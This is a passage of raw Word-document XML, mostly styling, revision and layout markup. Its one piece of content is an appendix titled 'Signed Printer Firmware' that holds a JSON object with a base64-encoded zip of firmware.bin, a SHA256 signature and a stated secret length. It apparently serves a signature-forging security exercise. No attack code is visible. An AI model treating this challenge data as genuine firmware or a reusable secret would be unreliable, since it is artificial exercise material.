      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rule. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071D0302" w14:textId="1EF84B36" w:rsidR="00C47AB6" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC311BE" w14:textId="49721A04" w:rsidR="00A81A30" w:rsidRDefault="00A81A30" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Signed Printer Firmware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC1A57" w14:textId="77777777" w:rsidR="00A81A30" w:rsidRDefault="00A81A30" w:rsidP="00A81A30">
      <w:r w:rsidRPr="00B532EB">
        <w:t>{"firmware":"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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B532EB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">luVVQFAAOipLthdXgLAAEEAAAAAAQAAAAAUEsFBgAAAAABAAEAUgAAALAJAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAABRQFBLAwQUAAAACACFhpNTnIs/STsAAAA9AAAADAAcAGZpcm13YXJlLmJpblVUCQADmbe/YZm3v2F1eAsAAQToAwAABOgDAAAVyskNgDAMBMA/VaQCtqbEioKlxV6Zo37EvMfU8PbCpUxC5XHP2pmroUugD+gZdIOH5emxcMxg/mX7AFBLAQIeAxQAAAAIAIWGk1Ociz9JOwAAAD0AAAAMABgAAAAAAAEAAAD/gQAAAABmaXJtd2FyZS5iaW5VVAUAA5m3v2F1eAsAAQToAwAABOgDAABQSwUGAAAAAAEAAQBSAAAAgQAAAAAA","signature":"98753dfc3688544efcedfa0da7228aac62d8ad187a77a7115b603273cdc18dac","secret_length":16,"algorithm":"SHA256"} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB795F" w14:textId="77777777" w:rsidR="00A81A30" w:rsidRPr="00A81A30" w:rsidRDefault="00A81A30" w:rsidP="00A81A30"/>
    <w:sectPr w:rsidR="00A81A30" w:rsidRPr="00A81A30" w:rsidSect="002950A1">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6BF3A" w14:textId="77777777" w:rsidR="000C2525" w:rsidRDefault="000C2525" w:rsidP="00A81A30">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7B306A77" w14:textId="77777777" w:rsidR="000C2525" w:rsidRDefault="000C2525" w:rsidP="00A81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F3627" w14:textId="5B8BE229" w:rsidR="00F5283E" w:rsidRPr="004F3E9B" w:rsidRDefault="004F3E9B" w:rsidP="004F3E9B">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="44"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A8185B4" wp14:editId="1D4B58AF">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:align>right</wp:align>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>8890</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1543050" cy="410210"/>
          <wp:effectExtent l="0" t="0" r="0" b="8890"/>
          <wp:wrapNone/>
          <wp:docPr id="9" name="Picture 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medium confidence"/>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543050" cy="4102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09DBE3E1" wp14:editId="40AF39DB">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:align>left</wp:align>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>7620</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1438275" cy="410210"/>
          <wp:effectExtent l="0" t="0" r="9525" b="8890"/>
          <wp:wrapNone/>
          <wp:docPr id="8" name="Picture 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medium confidence"/>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1438275" cy="41021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sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>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4CA00" w14:textId="77777777" w:rsidR="000C2525" w:rsidRDefault="000C2525" w:rsidP="00A81A30">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="21BB4E4E" w14:textId="77777777" w:rsidR="000C2525" w:rsidRDefault="000C2525" w:rsidP="00A81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9188F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA281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623343"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="281C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0F373C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45C610BC"/>
    <w:lvl w:ilvl="0" w:tplc="7C4040F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73"/>
    <w:rsid w:val="000B57D0"/>
    <w:rsid w:val="000C2525"/>
    <w:rsid w:val="000D5877"/>
    <w:rsid w:val="000F1A31"/>
    <w:rsid w:val="00131789"/>
    <w:rsid w:val="00144582"/>
    <w:rsid w:val="00163BCC"/>
    <w:rsid w:val="001C2E9D"/>
    <w:rsid w:val="001F1F4C"/>
    <w:rsid w:val="00284E5F"/>
    <w:rsid w:val="002950A1"/>
    <w:rsid w:val="00296B65"/>
    <w:rsid w:val="00305120"/>
    <w:rsid w:val="00307498"/>
    <w:rsid w:val="0033043D"/>
    <w:rsid w:val="00342C83"/>
    <w:rsid w:val="00366FB2"/>
    <w:rsid w:val="00413F94"/>
    <w:rsid w:val="00421B43"/>
    <w:rsid w:val="00427C35"/>
    <w:rsid w:val="0044142F"/>
    <w:rsid w:val="00466729"/>
    <w:rsid w:val="00466E80"/>
    <w:rsid w:val="00480D92"/>
    <w:rsid w:val="00491321"/>
    <w:rsid w:val="004B1DCF"/>
    <w:rsid w:val="004E1C19"/>
    <w:rsid w:val="004F3E9B"/>
    <w:rsid w:val="004F6F1D"/>
    <w:rsid w:val="00521837"/>
    <w:rsid w:val="0053096A"/>
    <w:rsid w:val="005558C2"/>
    <w:rsid w:val="00570253"/>
    <w:rsid w:val="005843A3"/>
    <w:rsid w:val="00594FBC"/>
    <w:rsid w:val="005B6C57"/>
    <w:rsid w:val="005D16A1"/>
    <w:rsid w:val="006023CC"/>
    <w:rsid w:val="00632029"/>
    <w:rsid w:val="006439C8"/>
    <w:rsid w:val="0067633B"/>
    <w:rsid w:val="00694B19"/>
    <w:rsid w:val="006B6779"/>
    <w:rsid w:val="006D7BCC"/>
    <w:rsid w:val="006E5000"/>
    <w:rsid w:val="007300B1"/>
    <w:rsid w:val="007907FF"/>
    <w:rsid w:val="007D6957"/>
    <w:rsid w:val="007E2CCE"/>
    <w:rsid w:val="007F48FB"/>
    <w:rsid w:val="00843947"/>
    <w:rsid w:val="00853B73"/>
    <w:rsid w:val="00855FBD"/>
    <w:rsid w:val="008609DD"/>
    <w:rsid w:val="00896066"/>
    <w:rsid w:val="008D2A0E"/>
    <w:rsid w:val="00933E9C"/>
    <w:rsid w:val="00937F83"/>
    <w:rsid w:val="0094724D"/>
    <w:rsid w:val="00950057"/>
    <w:rsid w:val="0097416F"/>
    <w:rsid w:val="00980740"/>
    <w:rsid w:val="00991C76"/>
    <w:rsid w:val="009A7612"/>
    <w:rsid w:val="00A108E8"/>
    <w:rsid w:val="00A10D05"/>
    <w:rsid w:val="00A54818"/>
    <w:rsid w:val="00A5549E"/>
    <w:rsid w:val="00A612B6"/>
    <w:rsid w:val="00A76E62"/>
    <w:rsid w:val="00A81A30"/>
    <w:rsid w:val="00A82F86"/>
    <w:rsid w:val="00AC7DA4"/>
    <w:rsid w:val="00AD6AA3"/>
    <w:rsid w:val="00AF47BA"/>
    <w:rsid w:val="00B020FD"/>
    <w:rsid w:val="00B532EB"/>
    <w:rsid w:val="00B955A0"/>
    <w:rsid w:val="00BA2406"/>
    <w:rsid w:val="00C25536"/>
    <w:rsid w:val="00C47AB6"/>
    <w:rsid w:val="00C60537"/>
    <w:rsid w:val="00CC6AA5"/>
    <w:rsid w:val="00D6316D"/>
    <w:rsid w:val="00DC1295"/>
    <w:rsid w:val="00DE3F4B"/>
    <w:rsid w:val="00DE4E4B"/>
    <w:rsid w:val="00DE7AF9"/>
    <w:rsid w:val="00DF3BB4"/>
    <w:rsid w:val="00E00F99"/>
    <w:rsid w:val="00E20C7A"/>
    <w:rsid w:val="00E317A8"/>
    <w:rsid w:val="00E44D4A"/>
    <w:rsid w:val="00E923BF"/>
    <w:rsid w:val="00F5283E"/>
    <w:rsid w:val="00F5566D"/>
    <w:rsid w:val="00F917B3"/>
    <w:rsid w:val="00FA472C"/>
    <w:rsid w:val="00FB2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D431D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4607B04F-D5CF-4365-8BD1-A0A4E0C8C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C76"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D6316D"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D6316D"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D6316D"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>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16D"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D6316D"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E317A8"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A82F86"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A82F86"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A81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A30"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A81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A30"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D6316D"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="006439C8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005B6C57"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00933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Inline">
    <w:name w:val="CodeInline"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeInlineChar"/>
    <w:qFormat/>
    <w:rsid w:val="0094724D"/>
    <w:rPr>
      <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CodeIndented">
    <w:name w:val="CodeIndented"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeIndentedChar"/>
    <w:qFormat/>
    <w:rsid w:val="006D7BCC"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeInlineChar">
    <w:name w:val="CodeInline Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CodeInline"/>
    <w:rsid w:val="0094724D"/>
    <w:rPr>
      <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="0030512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odeIndentedChar">
    <w:name w:val="CodeIndented Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CodeIndented"/>
    <w:rsid w:val="006D7BCC"/>
    <w:rPr>
      <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IntenseQuoteChar">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="IntenseQuote"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="00305120"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002950A1"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="002950A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949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="42795391">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="128210998">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1996495784">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1363896934">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="88620579">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1743336166">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="893928419">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2080856588">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="348067435">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="165246361">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="110130194">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="224099577">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="243608863">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="605622422">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1198204452">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="911424748">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1196577613">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1096176933">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="98838508">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="522596017">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1534273009">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
